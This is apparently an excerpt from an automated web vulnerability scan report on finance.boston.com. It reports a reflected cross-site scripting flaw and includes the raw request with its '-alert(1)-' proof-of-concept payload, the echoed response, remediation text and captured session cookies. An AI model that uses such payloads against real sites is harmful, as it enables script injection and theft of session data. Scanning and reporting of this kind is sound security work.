#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<style type="text/css">
#error {
padding: 0 5px;
}
#error .box {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
background: #254f7c;
padding: 1em;
_height: 164px;
min-height: 164px;
color: #fff;
font-size: 1.5em;
position: relative;
}
#error .box.gray {
background: #2a2a2a;
}
#error .box .box_inner {
margin-top: 180px;
}
#error .box .icon {
height: 164px;
width: 164px;
position: absolute;
top: 20px;
left: 20px;
background: url(http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png) no-repeat top left;
_filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png', sizingMethod='image');
_background: transparent;
}
#error .box h3 {
color: #fff;
margin: 0;
padding: 0;
font-size: 2.0em;
    line-height: 2.0em;
font-weight: bold;
}
#error .box h3 strong {
color: #7cc45e;
text-transform: uppercase;
}
#error .box.gray h3 strong {
color: #718ba9;
}
#error .box .error-info {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
padding: 1em;
background: #395F88;
}
#error .box.gray .error-info {
background: #3d3d3d;
}
#error .box.gray .error-detail {

}
</style>
<!-- /404 STYLING -->

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="50%" valign="top">
<div class="widget fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
</td>
<td width="50%" valign="top">
<div id="error">
<div class="box error">
<div class="box_header">
<div class="box_corner"></div>
</div>
<div class="icon"></div>
<div class="box_inner">
<h3><strong>Error:</strong> 404</h3>
<div class="error-info">
The page you requested cannot be found - please try one of the links above.
</div>
</div>
<div class="box_footer">
<div class="box_corner"></div>
</div>
</div>
</div>
</td>
</tr>
</table>




</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnews%2Freadf0ed0'-alert(1)-'9c008cc89a8%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff%26GUID%3D17744398&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




1.4. http://finance.boston.com/boston/news/read [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/read

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2cff'-alert(1)-'e4c1d21a320 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boston/news/read?GUID=17744398&e2cff'-alert(1)-'e4c1d21a320=1 HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; RMFD=011PrVUgO105wRm|O205ya3|O105yhs; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:45:15 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 16 Mar 2011 22:45:15 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 35418

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
